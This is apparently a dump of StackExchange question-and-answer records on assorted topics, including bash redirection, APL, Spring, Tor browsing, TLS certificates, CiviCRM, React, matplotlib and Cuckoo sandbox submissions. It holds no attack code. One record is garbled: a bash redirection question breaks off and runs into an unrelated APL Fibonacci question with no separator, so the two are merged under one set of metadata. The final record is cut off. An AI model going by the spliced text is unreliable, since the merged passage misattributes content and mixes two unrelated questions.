suggestions:\nAssess what she knows and doesn't know. Give her an oral written assessment of the skills she needs. Make sure she understands that you need to know what to teach her.\nMake the parents your partners. Tell them you are happy to encourage and praise her, but she also has to learn the material, which is hard because she has gaps. Tell them about your plan to assess her and ask them to encourage her to approach the assessment without worry so that you can best figure out how to teach her. Ask them to encourage her to be comfortable saying I don't know and also to be comfortable when making mistakes.\nGive her opportunities to succeed. This will be easier to do once you have assessed her. Ask her easy questions that she can answer.\nPraise and encouragement should be for effort not for success.\nAnswer: Both Amy B and Reese Johnston have given some excellent suggestions but make sure you pay attention so that the student doesn't use tears (even unconsciously) to avoid work or get spoonfed answers. Without observation or more details, I cannot tell if the parents are simply accommodating a more sensitive child or have fallen into the habit of removing anything that frustrates the child.\nAnswer: Let me clarify the situation: you are her teacher, not her parent. This makes it your job to explain matter to her, and it's the job of the parents to prepare her for that.\nAs you have stated:\n\nHer father said she is sensitive. I was asked to do more praising and encouraging from her parents.\n\nThis is not your job! Not at all!\nLet's face it: crying is an enormous time and focus waster: when a person starts crying, he or she looses his or her focus for quite a long time, so it should happen as less as possible.\nI remember that, also at the age of 12, during one lesson, I've been crying too. 
As far as I know, the teacher did not even speak to me; he just let it happen, and I never had any bad feelings towards that teacher for that.\nI have the impression that the parents are not dealing well with their sensitive child and leave the burden on you, and that's not the way education is to be done: it's your job to deliver the matter and it's their job to make her ready for dealing with that matter.\nOh, if you think I'm being harsh here, just think about this situation: I imagine you have a regular class of about 20 students, and you are planning on adapting yourself to the \"special\" needs of one single student. Another student might notice that and invent a \"special\" need for him- or herself too; do you see the snowball effect coming? ... in the end you'll be dealing with so many \"special\" needs that you won't be able to teach your class anymore.\nDoes this mean there is nothing you can do? Well, the easiest thing you can do is increase the praise for every student in your class. This way, her need for praise might be fulfilled (or at least reduced) and you don't make an exception for one student. But don't go further than that.\n","meta":{"source":"matheducators.stackexchange","title":"Advice on how to tutor a twelve year old that starts to cry?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bash : behaviors of the redirections\n\nQuestion: \nPlease confirm whether my understanding is correct, or correct me if I am wrong; pointers to related technical articles and documents would be appreciated.\n\nThese do the same thing.\n\n<code>ls &>\/tmp\/01.log<\/code>\n<code>ls 2>&1 >\/tmp\/02.log<\/code>\n<code>ls > \/tmp\/03.log 2>&1<\/code>\n<code>ls 2>&1 1>\/tmp\/04.log<\/code>\n\nThe result of 5 will be the same as 1 to 4 on a single-core CPU, where there will be no multiple execution threads in a process. If it could produce a different result, please help me understand what is actually happening in each process and in the kernel.\nIn a multi-core CPU environment, could it happen that while a thread on one core is writing to stdout, another thread on another core writes to stderr and they get interleaved?\n\n<code>ls 1>\/tmp\/05.log 2>\/tmp\/05.log<\/code>\n\nThe one below could cause errors, e.g. stderr tries to write but stdout has not output anything yet.\n<code>ls 1>\/tmp\/05.log 2>>\/tmp\/05.log\n<\/code>\n\nThe same as 1 to 4. 
I know there's several codes, but since I haven't studied advanced things, I started to write my own code.\nFirst I made this array: \nThe idea is simple : the element at (1,1) in N\u207f is (n+1)th fibonacci sequence.\nWhat I did was:\n\nand\n\nWell, it works. However, if I want 16th term, then I should do\n\nWhat I need is to write arbitary amount of Ns. Of course I know about {rho}. However,\n\n(bottom was cut)\nAnd I noticed that (i 2 2){rho}N and i Ns are different.\n\nWhat operator I should use to do same thing as N N N...N does?\nAnswer: You were almost there. <code>\u2374<\/code> (\"reshape\") is the right operator to use; however, you want it to treat your matrix N not as a matrix, but as a single, scalar element. For this purpose, you wrap it using the \"enclose\" operator <code>\u2282<\/code>:\n<code> 4\u2374\u2282N\n 1 1 1 1 1 1 1 1 \n 1 0 1 0 1 0 1 0\n<\/code>\nIf we wrap this up, we arrive at (e.g.) the following expression:\n<code> \u2191\u00a8+.\u00d7\\16\u2374\u22822 2\u23741 1 1 0\n1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597\n<\/code>\n(Allow me one remark, though: by definition, the Fibonacci sequence starts with <code>0<\/code> and <code>1<\/code>.)\nComment: Thank you! I [heard](http:\/\/www.youtube.com\/watch?v=a9xAKttWgP4) about the enclose operator, but I didn't know what that does.\nAnswer: If you want to start with 0 and 1, just use 0 1 1 1 instead of 1 1 1 0\n<code> \u2191\u00a8+.\u00d7\\16\u2374\u22822 2\u23740 1 1 1\n0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to write N N N .... N using operators (or other things)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Spring framework default-lazy-init all beans\n\nQuestion: Is there a spring property to lazy-init all beans that spring framework loads ?\nI know about these properties\n<code> - lazy-init=\"true\"\n - default-lazy-init=\"true\"\n<\/code>\nhowever there are multiple spring config xml files and some are packaged within jar so dont have liberty to change neither <bean> nor <beans> tag.\nAny other way to tackle this via configuration ? or programatically ?\nComment: I really wish I could do this. We are autowiring a lot of beans, so it takes 15-20 seconds to pre-instantiate them all. I would love to change this on my developer machine to improve startup time, but keep it the same on the production server.\nAnswer: Short of extending the Spring bean loader, none that I know of.\nAnswer: You caN also use <code>@Lazy<\/code> annotation, but it is the same as you mentioned above.\nAnswer: According to java doc this should work ( though it looks not nice)\n<code>if (context.getBeanFactory() instanceof DefaultListableBeanFactory)\n {\n ((DefaultListableBeanFactory) context.getBeanFactory()).setAllowEagerClassLoading(false);\n }\n<\/code>\nAnswer: I've implemented this on my company, had to extend some classes of spring tough. It wasn't easy, but we gained about 20s on every tomcat startup. Unfortunately, for privacy clauses, I can't show the code, but take a look at ClassPathBeanDefinitionScanner,DefaultBeanDefinitionDocumentReader,ContextNamespaceHandler and ComponentScanBeanDefinitionParser classes. 
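The matrix idea behind the APL answer above (repeatedly multiplying the 2x2 matrix built from 1 1 1 0, whose powers carry Fibonacci numbers in their first entry) can be written out in plain Python as a rough analogue of the scan; the function name here is made up for illustration:
<code>def fib_prefix(n):
    # Keep a running product of the matrix [[1, 1], [1, 0]]; after k
    # multiplications its top-left entry is the (k+1)-th Fibonacci number,
    # which matches the scan used in the APL answer.
    a, b, c, d = 1, 0, 0, 1   # identity matrix [[a, b], [c, d]]
    out = []
    for _ in range(n):
        a, b, c, d = a + b, a, c + d, c   # multiply on the right by [[1, 1], [1, 0]]
        out.append(a)
    return out

print(fib_prefix(16))
# [1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597]
</code>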
\nComment: Well, its something very similar to this: http:\/\/batmat.net\/blog\/post\/2008\/01\/13\/How-to-load-a-XML-Spring-context-lazily-by-default, but I did also for annotated beans and beans imported from the first xml\nAnswer: Starting with Spring Boot 2 you can use the spring.main.lazy-initialization property to configure lazy initialization across the whole application.\nSetting the property value to true means that all the beans in the application will use lazy initialization.\nin application.yaml\n<code>spring:\n main:\n lazy-initialization: true\n<\/code>\nor in application.properties\n<code>spring.main.lazy-initialization=true\n<\/code>\n","meta":{"source":"stackoverflow","title":"Spring framework default-lazy-init all beans","dup_signals":{}},"subset":"stackexchange"} +{"text":"Noob to tor\/tails\/darknet...forgot to disable Javascript. What to do now?\n\nQuestion: I am a noob as stated in title. I didn't know how to disable Javascript before visiting some not-so-legit sites. So what can I do? I was using tor, I know this is not enough so I have tails ring a persistent volume on a USB stick as added security. Can I go back, with javascript disabled, and create a new user name and information for those sites and be ok? I just browsed these sites but did create user info. \nSo is browsing sites illegal? The sites were certain markets. Can I somehow erase my history? Literally visited 2 markets (looking no keys were exchanged nor vital information not even a name).\nTo disable JS, I just change the level of security on tor, correct? If no, please if you have time explain or point me to a site that can. \nComment: Staying \"anonymous\" on the internet. There's always something that will give you away. Once you've created a history, assume it's permanent. Your computer isn't the only place history is found.\nComment: define \"be ok\"?\nComment: \"Is browsing sites illegal\" is up to the country you are browsing from. As it is a legal question, we are not qualified to answer it.\nAnswer: Tor should have noscript installed. You simply click on the NoScript extension and click disable javascript on all sites.\nUnfortunately, once you've done something on the internet you can't change it. You can't go back and do it again differently, just like you can't in real life.\nConsider refraining from doing things you might later regret, especially if you don't really understand what you're doing.\nComment: \"Tor Browser\" comes with NoScript, there's a difference.\nAnswer: The sequence to check-up is just exactly the same as if you were browsing from unsafe place, like public open wifi : full system scan, log checking, anti-malware tools risen to the maximum protection level. Tor\/darknet is just a network, no darknet-specific problems there so far : you can leak your data with the same result as in clearnet\/internet.\n","meta":{"source":"security.stackexchange","title":"Noob to tor\/tails\/darknet...forgot to disable Javascript. What to do now?","dup_signals":{}},"subset":"stackexchange"} +{"text":"One domain using certificate of other domain\n\nQuestion: I recently Googled a website e.g A.com and found B.com in search result at the top. In reality A.com should be on top as B.com doesn't have anything in common or related to A.com but Google shows it in search result at top. In fact all meta tags \/ keywords are not there in B.com \nNow the interesting part is, when I visit B.com, browser does show me a warning. I ignore it and visit the website. 
Interestingly, all the content is from A.com. Even the contact form submitted is received by A.com. When I visit B.com without https original B.com is shown, whereas if I use https:\/\/B.com, then A.com is shown (browser url bar shows B.com with security warning)\n1] Now I wonder why this is happening? \n2] Has B.com installed A.com certificate by mistake? \n3] If so, how can they get private key for that purpose? \n4] Why Google is showing that website in search results?\nComment: We have no way (besides guessing) to know what is the matter as long as you don't tell us the names of the websites. Please [edit] your question to do so.\nAnswer: \n2] Has B.com installed A.com certificate by mistake? 3] \u00b4If so, how can they get private key for that purpose?\n\nProbably A.com and B.com are both hosted at the same server and have the same IP address. It is a common (mis)configuration of the server that if there is no certificate configured for B.com then it will use a certificate of another domain at the same IP address, in this case A.com. In other words: B.com does not explicitly use the certificate for A.com but it just happens to be the implicit fallback certificate on the host which serves both A.com and B.com.\n\n1] Now I wonder why this is happening? ... 4] Why Google is showing that website in search results?\n\nIt looks like Google's web crawler does not really care about the validity of the certificate when crawling a web site and thus <code>https:\/\/B.com<\/code> ends up to be indexed despite this configuration problem with the content of <code>https:\/\/A.com<\/code> and thus also shows up in the search results with this content. And the crawlers of Microsoft Bing and Baidu seem to ignore invalid certificates too since they also show up in the logs of a domain I explicitly serve for such tests with an invalid certificate.\n","meta":{"source":"security.stackexchange","title":"One domain using certificate of other domain","dup_signals":{}},"subset":"stackexchange"} +{"text":"Compiler but not Interpreter\n\nQuestion: Total := 60 + 10; \nLD #60\nADD #10\nST Total \n00101000 00111100\n00111000 00001010\n01100000 00101001\nGoing from the HLL code to the binary uses a translator, a question in A levels is asking what translator has been used. But the answer does not allow interpreter, only compiler is the correct answer, why is it so? There isn't any other information.\nAnswer: Well, you haven't given the full wording of the question so I don't know why you think that, unless it is multiple choice or something.\nBut that data suggests they want 'compiler' as the answer because the first translation is from high level language to some sort of assembly, and then from assembly to binary code.\nSo only translation has been done; the code has not been executed yet, and therefore can't have been interpreted.\nAn interpreter may possibly include such a translation as a first pass (but more usually as one step), and that process may be called compilation. For example, high-level language to byte-code.\n","meta":{"source":"stackoverflow","title":"Compiler but not Interpreter","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can i display the Role name for a user in ASP.NET\n\nQuestion: I have a MasterPage in which I display two things: one is the user name which I display with the following command <code><%: Context.User.Identity.GetUserName() %><\/code> and one is the user role. 
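One way to check the situation described in the certificate answer above is to pull down whatever certificate a server actually presents for a given name. A small Python sketch using only the standard library; the hostnames are placeholders standing in for A.com and B.com:
<code>import ssl

# Fetch the PEM certificate each host serves, without validating it, so a
# B.com that falls back to A.com's certificate shows up directly.
for host in ("a.example", "b.example"):   # placeholder hostnames
    pem = ssl.get_server_certificate((host, 443))
    print(host)
    print(pem)
</code>
The subject and subjectAltName of the returned certificate can then be compared against the hostname that was requested, for example with <code>openssl x509 -noout -text</code>.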
\nHow can i display it?\nThank you.\nComment: When you log a user in you create its Identity - somehow - when this is done you also need to code in the role. I believe that is an extension method. They are extension methods because reading out of Identity stuff can be a nightmare.\nAnswer: Try it like this if you have access to UserManager:\n<code>UserManager.FindByName(Context.User.Identity.GetUserName()).Roles\n<\/code>\nOr if you have a access to any Identity based user you should be able to get roles also like this:\n<code>AppUser.Roles;\n<\/code>\nOr search any Identity user with specific name and get its roles:\n<code>UserManager.FindByName(\"Name\").Roles;\n<\/code>\nI'm using Identity 2.0\nUPDATE:\nSo if you have access UserManager and RoleManager in master page code, you could write a method, which gets user roles like this:\n<code> public List<string> GetUserRoles(string username)\n {\n List<string> ListOfRoleNames = new List<string>();\n var ListOfRoleIds = UserManager.FindByName(username).Roles.Select(x => x.RoleId).ToList();\n foreach(string id in ListOfRoleIds)\n {\n string rolename = RoleManager.FindById(id).Name;\n ListOfRoleNames.Add(rolename);\n }\n\n return ListOfRoleNames;\n }\n<\/code>\nThen it's up to you how you call this in your view or populate these roles to user while loading page.\nComment: My Identity version is 2.2.1. I have access to UserManager but no method there. There is another way to display the user role in a MasterPage? Maybe in code?\nComment: Why not create a a method?\nAnswer: As you are using the Web Forms view engine, I am assuming you must be using asp.net Membership as that was available for MVC 2.0.\nThere can be multiple roles assigned to a user, the following will loop and print them out:\n<code><% foreach(var role in Roles.GetRolesForUser())\n{ %>\n <%:role%>\n<% } %>\n<\/code>\n","meta":{"source":"stackoverflow","title":"How can i display the Role name for a user in ASP.NET","dup_signals":{}},"subset":"stackexchange"} +{"text":"User Dashboard and Edit Profile for Organization\n\nQuestion: We have set up a User dashboard for individuals, and a profile so individuals can update their address, phone, email, etc. It looks like this:\n\nWe would like to set up something similar for an Organization, so permissioned users can see the organization's membership expiration date, and update the contact info for the organization.\nI understand that the way to do this is to set a permissioned relationship, so the individual can view and edit the Organization. However, if I click the Organization, it doesn't take me to a user dashboard for the Organization, but a contact view as if an administrator were logged in. Membership information is not visible. The edit function is not a profile with limited fields, but all the fields an administrator could edit (see below photos):\n\nAm I missing something? Is there a way to see a user dashboard for an organization, like there is for an individual? Can I limit the organizational fields that can be edited?\nI am using CiviCRM 5.31.0 with WordPress.\nAccess control: Subscriber (the user) can: view my contact, edit my contact, access contact dashboard\nRelationship permission: set to view and update\nEDIT pd added image showing what dmaster shows for comparison\nComment: if A works for B, and A is permissioned to Edit B, and A has access to their own Contact Dashboard, then they should be able to access a profile to edit B. 
Not sure if that is what you are after but it didn't seem to be covered in your description\nComment: We'd like A to be able to access the user dashboard for B, and a profile to edit B's information. Neither is currently the case; clicking the link for B leads to the second and third photos in my post above. Is there a different way to access a profile to edit B?\nComment: on dmaster, as user\/1 if i go to my dashboard https:\/\/dmaster.demo.civicrm.org\/civicrm\/user?reset=1 i see an Org, and if i click the Edit Contact Info and right click to open in new tab it takes me to eg https:\/\/dmaster.demo.civicrm.org\/civicrm\/contact\/relatedcontact?action=update&reset=1&cid=185&rcid=203\nis that same as with your set up?\nComment: or this in the case of their Employer which I just added. https:\/\/dmaster.demo.civicrm.org\/civicrm\/contact\/relatedcontact?action=update&reset=1&cid=47&rcid=203\nComment: Sorry, I can't access the links you provided and the site won't let me create an account.\nComment: all the demo sites just have login \/ pw as demo | demo\nComment: but they get refreshed every 24 hours so not sure if it will still be there. but easy enough for you to follow what i did and repeat isn't it?\nComment: Got it, thank you! I see what you're talking about. On the demo site, the links I'm seeing by the Org are \"Edit Contact Information\" and \"Dashboard,\" which looks like what we want. But that's not what I'm seeing on my site. The links there are \"View\" and \"Edit.\"\nComment: I added another picture to my original post. The second picture now shows how the Organization shows up in the user dashboard, and the links it gives.\nComment: I added a shot from dmaster for comparison. odd. not sure how you would have config on your system that is changing this. worth disabling extensions just to check there isn't something else affecting this.\nAnswer: We have used contact layout editor extension to show only necessary fields on view contact section. Using contact layout editor you can customize the view contact page. You can include profiles with limited fields and hide or remove the edit option via css or JS.\nOr other option is write extension to redirect Org contact to \/civicrm\/contact\/dashboard?cid=123&reset=1\nAFAIK having Relationship permission: set to view and update will only allow user to updated the related contact details but not Payments or Membership. Try giving 'Access civi membership' permission to user role\nAnswer: If you want a user to only edit specific fields for their organisation you can create a profile and add the organisation fields you want to give them access to. From the CiviCRM profiles page:\n\nCiviCRM Profile(s) allow you to aggregate groups of fields and include\nthem in your site as input forms, contact display pages, and search\nand listings features. They provide a powerful set of tools for you to\ncollect information from constituents and selectively share contact\ninformation.\n\nProfiles can be used to list contacts, create new contacts or edit contacts. For your requirement, the profile would be a standalone form profile for editing. When you create a link to the profile edit form, you'll need to make sure you pass the organisaton contact ID in the URL as one of the parameters. 
For instance, if your profile form had an ID of 6, and the organisation contact ID was 18 then your URL would be:\n<code>www.mydomain.com\/civicrm\/profile\/edit?gid=6&id=18&reset=1<\/code>\nNote that the query parameter label for the contact ID is <code>id<\/code>, not <code>cid<\/code>. The <code>gid<\/code> query parameter refers to the id of the profile form.\nTo ensure the correct permissions to allow access to the profile, you may need to update the civicrm ACL permissions at <code>\/civicrm\/acl?reset=1<\/code>.\nNote: if you do not pass the organisation ID parameter correctly in the URL then you'll get a warning message saying:\n\nThis profile is configured for contact type 'Organization'. It cannot\nbe used to edit contacts of other types.\nComment: So if I have created this profile for the org record, and I have a related individual record which is permission to view and edit the org, can I send a checksum link to the individual in email that will take them to the pre-filled org profile, and update it without them having to log in?\nComment: Something like www.mydomain.com\/civicrm\/profile\/edit?gid=6&id=18&reset=1&cid=indivcontactid&checksum\nComment: I haven't used a checksum link before so not sure if this will work. You might want to ask a seperate question about this.\n","meta":{"source":"civicrm.stackexchange","title":"User Dashboard and Edit Profile for Organization","dup_signals":{}},"subset":"stackexchange"} +{"text":"Manually ending or canceling touch phase in corona sdk?\n\nQuestion: Is it possible to manually cancel or end the touch phase on an object? I basically want to make it impossible for the user to drag the object unless they take there finger off the screen and start to drag it again. Is this possible?\nComment: you can do it in a simple way by adding flag.\nComment: How would I go about doing that? Sorry, about my questions. I'm quite a noob.\nAnswer: <code>local isDragAllowed = 0 -- create a flag or a variable\n\nlocal bg = display.newRect(0,0,display.contentWidth,display.contentHeight) -- background\n\nlocal myObject = display.newImageRect(\"Icon.png\", 50, 50); -- your object\nmyObject.x = 160\nmyObject.y = 240\n\nlocal function touchHandler(event)\n if(event.phase==\"began\")then\n isDragAllowed = 1\n elseif(event.phase==\"moved\" and isDragAllowed==1)then\n -- object will be moved only if the flag is true or 1\n myObject.x = event.x\n myObject.y = event.y\n else\n isDragAllowed = 0 -- resetting the flag on touch end\n end\n return true;\nend\nmyObject:addEventListener(\"touch\",touchHandler)\n\nlocal function bgTouchHandler(event)\n print(event.phase)\n isDragAllowed = 0 -- resetting the flag if drag\/touch happens on background\n return true;\nend\nbg:addEventListener(\"touch\",bgTouchHandler)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Manually ending or canceling touch phase in corona sdk?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Dynamic page numbering using XSL snippet\n\nQuestion: I have page numbers in sequential order within a RTF document. However my document output has multiple documents in sequential order. My first document is of 4 pages, the second is for 3 pages and 3rd 2 pages. My single document output throws out a RTF document comprising of all three documents. 
But the page no.s are in increasing order 1,2,3,4 ....\nIdeally I would want my second document to start from page 1 and so is the case with my third document.\nHow do I accomplish this using XSL coding within the footer ?\nThanks.\nComment: An example input XML would be nice\nAnswer: In XSL-FO to restart page numbers in a page sequence use <code>initial-page-number=\"1\"<\/code> on your <code><fo:page-sequence><\/code> element.\nWhether that works for your RTF output or not is up to the vendor of your software. What I've given you is what the specification says to do.\n","meta":{"source":"stackoverflow","title":"Dynamic page numbering using XSL snippet","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I send a file with DLL to Cuckoo Sandbox?\n\nQuestion: I want to submit an executable for analysis in Cuckoo Sandbox.\nThe file must be in the same folder with a DLL I have. How can I request Cuckoo to test my exe and make it run properly? (i.e exe and dll in the same directory).\nNote - I don't have any problem to put the dll at the guest machine, take a snapshot and then submit the file. I just don't know where to put my dll in the guest machine (Where Cuckoo put the exe on guest?)\nThanks in advance.\nAnswer: Cuckoo creates a folder with a randomly generated name (So it changes every time you run a new analysis) in the root of C:\\ which it uses to store the submitted file, among other things.\nWhat you could probably do is create a zip file containing both your executable and your DLL file, then submit that zip to Cuckoo. When the analysis is run Cuckoo's zip package will unzip the archive containing both files into the same directory, then run the first executable it finds from that zip.\nI think that should do the trick.\n","meta":{"source":"security.stackexchange","title":"How can I send a file with DLL to Cuckoo Sandbox?","dup_signals":{}},"subset":"stackexchange"} +{"text":"running commands from cloud-builders-community\/sonarqube\/\n\nQuestion: <code>gcloud builds submit . --config=cloudbuild.yaml\nCreating temporary tarball archive of 6 file(s) totalling 3.2 KiB before compression.\nUploading tarball of [.] to [gs:\/\/training_cloudbuild\/source\/1670817617.242895-f55df2adc5e04b5ca65f2ed1a6a12fe4.tgz]\nERROR: (gcloud.builds.submit) 403 Could not upload file [\/tmp\/tmprwqmw411\/file.tgz] to [training_cloudbuild\/source\/1670817617.242895-f55df2adc5e04b5ca65f2ed1a6a12fe4.tgz]: Access denied.\n<\/code>\nrunning commands from cloud-builders-community\/sonarqube\/ in the instance and getting this error .Need help how to run sonar scanner in cloud build .Need to use sonarqube while running the code in cloud build.\nAnswer: From Troubleshooting build errors documentation\n\n4xx client errors\nThis group of errors indicates that the build\nrequest is not successful presumably by fault of the user sending the\nrequest. 
Some examples of 4xx client errors are:\n\n<code>**Error**: 404 : Requested entity was not found\n**Error**: 404 : Trigger not found\n**Error**: 400 : Failed Precondition\n**Error**: 403 : Permission denied\n<\/code>\nError message:\n<code>ERROR: (gcloud.builds.submit) 403 Could not upload file [\/tmp\/tmprwqmw411\/file.tgz] to [training_cloudbuild\/source\/1670817617.242895-f55df2adc5e04b5ca65f2ed1a6a12fe4.tgz]: Access denied.\n<\/code>\nThe error stats, the Service Account does not have access to <code>[gs:\/\/training_cloudbuild\/]<\/code>\nTry adding below permission to build Service Account:\n<code>storage.objects.create\nstorage.objects.get\nstorage.objects.list\n<\/code>\n","meta":{"source":"stackoverflow","title":"running commands from cloud-builders-community\/sonarqube\/","dup_signals":{}},"subset":"stackexchange"} +{"text":"Objects are not valid as a React child (found: object with keys ..)\n\nQuestion: I am trying to build a basic app where I fetch some restaurants from yelp api.\nI get the error below on iOS and I can't seem to fix it. \n\nObjects are not valid as a React child (found: object with keys {id,\n alias, name, image_url, is_closed, url, review_count, categories,\n rating, coordinates, transactions, price, location, phone,\n display_phone, distance}). If you meant to render a collection of\n children, use an array instead.\n\nWhen I remove the part <code>results={filterResultsByPrice('$')}<\/code> from <code><ResultsList><\/code> the app works again.\nWould appreciate a lot if someone could help.\nThis is my main screen:\n<code>import React, {useState} from 'react';\nimport { View, Text, StyleSheet } from 'react-native';\nimport SearchBar from '..\/component\/SearchBar';\nimport useResults from '..\/hooks\/useResults';\nimport ResultsList from '..\/component\/ResultsList';\n\nconst SearchScreen = () => {\n const [term, setTerm] = useState(''); \n const [searchApi, results, errorMessage] = useResults();\n\n const filterResultsByPrice = (price) => {\n return results.filter( result => {\n return result.price === price;\n });\n\n };\n\n return (\n <View>\n <SearchBar \n term={term} \n onTermChange={(newTerm)=> setTerm(newTerm)} \n onTermSubmit={searchApi}\n \/>\n {errorMessage ? 
<Text>{errorMessage}<\/Text> : null }\n <Text>We have found {results.length} results<\/Text>\n\n <ResultsList results={filterResultsByPrice('$')} title=\"Cost Effective\"\/>\n <ResultsList results={filterResultsByPrice('$$')} title=\"Bit Pricier\"\/>\n <ResultsList results={filterResultsByPrice('$$$')} title=\"Big Spender\"\/>\n\n <\/View>\n\n );\n\n};\n\nconst styles = StyleSheet.create({});\n\nexport default SearchScreen;\n<\/code>\nThis is the component I want to place on the screen:\n<code>import React from 'react';\nimport { View, Text, StyleSheet} from 'react-native';\n\nconst ResultsList = ({ title, results }) => {\nreturn (\n <View>\n <Text style={styles.title}> {title}<\/Text>\n <Text> Results: {results.length} <\/Text>\n <\/View>\n );\n};\n\nconst styles = StyleSheet.create({\n title:\n {\n fontSize: 18,\n fontWeight: 'bold'\n }\n\n});\n\nexport default ResultsList;\n<\/code>\nAnd this is my useResults hook:\n<code>import {useEffect, useState } from 'react';\nimport yelp from '..\/api\/yelp';\n\nexport default () => {\n\n const [results, setResults] = useState([]); \/\/default is empty array\n const [errorMessage, setErrorMessage] = useState('');\n\n const searchApi = async searchTerm=> {\n console.log('Hi there');\n try {\n const response = await yelp.get('\/search', {\n params: {\n limit: 50, \n term: searchTerm, \n location: 'san jose'\n }\n });\n setResults(response.data.businesses);\n } catch (err) {\n setErrorMessage('Something went wrong.');\n }\n };\n\n useEffect(()=> {\n searchApi('pasta');\n\n }, []);\n\n return [searchApi, results, errorMessage];\n\n};\n<\/code>\nComment: I have no clue why, but after I added the console log under `ResultsList`, without changing absolutely nothing else, it is now working as expected... This is strange.\nComment: Can you please `console log` the results array? It seems the filter for '$' is not being filtered-out properly.\nComment: @Jawadulhassan I can see the full list returning from yelp as expected\nComment: It happens to all us, sometimes :) \n\nBut problem is in your mapping of results.length.\nComment: @CigdemSahiner did you find the answer I a too facing this issue.\nAnswer: You need to update your ResultsList component to this one, hopefully it will fix your issue permanently:\n<code>import React from \"react\";\nimport { View, Text, StyleSheet } from \"react-native\";\n\nconst ResultsList = ({ title, results }) => {\n return (\n <View>\n <Text style={styles.title}> {title}<\/Text>\n {results.map(result => (\n <Text>Results: {result.length}<\/Text>\n ))}\n <\/View>\n );\n};\n\nconst styles = StyleSheet.create({\n title: {\n fontSize: 18,\n fontWeight: \"bold\"\n }\n});\n\nexport default ResultsList;\n<\/code>\n","meta":{"source":"stackoverflow","title":"Objects are not valid as a React child (found: object with keys ..)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Create subplots from output (a singular plot) of a function\n\nQuestion: I have a function that returns a singular plot. I would like to repeat this function thrice and have the 3 plots side-by-side in a 1x3 format. How do i go about achieving this? 
\n<code>def plot_learning_curve(estimator, X, y, ylim=None, cv=None,\n n_jobs=-1, train_sizes=np.linspace(.1, 1.0, 5)):\n \"\"\"Generate a simple plot of the test and training learning curve\"\"\"\n plt.figure()\n plt.title(str(estimator).split('(')[0]+ \" learning curves\")\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n<\/code>\nI have tried this method, but it just returns an empty 1x3 grid with the plots below this empty grid\n<code>fig, axes = plt.subplots(nrows = 1, ncols = 3, sharex=\"all\", figsize=(15,5), squeeze=False)\n\naxes[0][0] = plot_learning_curve(tuned_clfs_vert_title2[0][0][1],Xs_train1,Y_train1,cv=skfold)\naxes[0][1] = plot_learning_curve(tuned_clfs_vert_title2[0][1][1],Xs_train1,Y_train1,cv=skfold)\naxes[0][2] = plot_learning_curve(tuned_clfs_vert_title2[0][2][1],Xs_train1,Y_train1,cv=skfold)\n<\/code>\nI'm keen to use this learning curve plotting function as a 'module'. I guess the alternative way is to write a loop within this function.\nComment: Have you had a look at the [matplotlib examples for subplots](https:\/\/matplotlib.org\/examples\/pylab_examples\/subplots_demo.html)?\nAnswer: You don't provide the axis to the plotting function. I can't use your code, because it is not a Minimal, Complete, and Verifiable example. 
But here is one approach that you can adapt to your needs:\n<code>#plot function with defined axis\ndef plot_subplot(ax, xdata, ydata, plotnr):\n ax.plot(xdata, ydata)\n ax.set_title(\"Plot {}\".format(plotnr))\n return\n\n#subplot grid 2 x 3 to illustrate the example for more than one row\/column\nfig, axes = plt.subplots(nrows = 2, ncols = 3, sharex = \"all\", figsize = (15,5), squeeze=False)\n#reproducibility seed\nnp.random.seed(54321)\n#loop over axes, we have to flatten the array \"axes\", if \"fig\" contains more than one row\nfor i, ax in enumerate(axes.flatten()):\n #generate random length for data\n lenx = np.random.randint(5, 30)\n #generate random data, provide information to subplot function\n plot_subplot(ax, np.arange(lenx), np.random.randint(1, 100, lenx), i)\n\nplt.show()\n<\/code>\nOutput:\n","meta":{"source":"stackoverflow","title":"Create subplots from output (a singular plot) of a function","dup_signals":{}},"subset":"stackexchange"} +{"text":"AWK modulo does not work correctly with trace file\n\nQuestion: Using AWK, I am trying to parse a trace file like this: \n<code>s 5.072000000 _59_ AGT --- 9 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [9] 0 0\nr 5.072000000 _59_ RTR --- 9 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [9] 0 0\ns 5.080000000 _59_ AGT --- 10 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [10] 0 0\nr 5.080000000 _59_ RTR --- 10 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [10] 0 0\ns 5.088000000 _59_ AGT --- 11 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [11] 0 0\nr 5.088000000 _59_ RTR --- 11 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [11] 0 0\ns 5.096000000 _59_ AGT 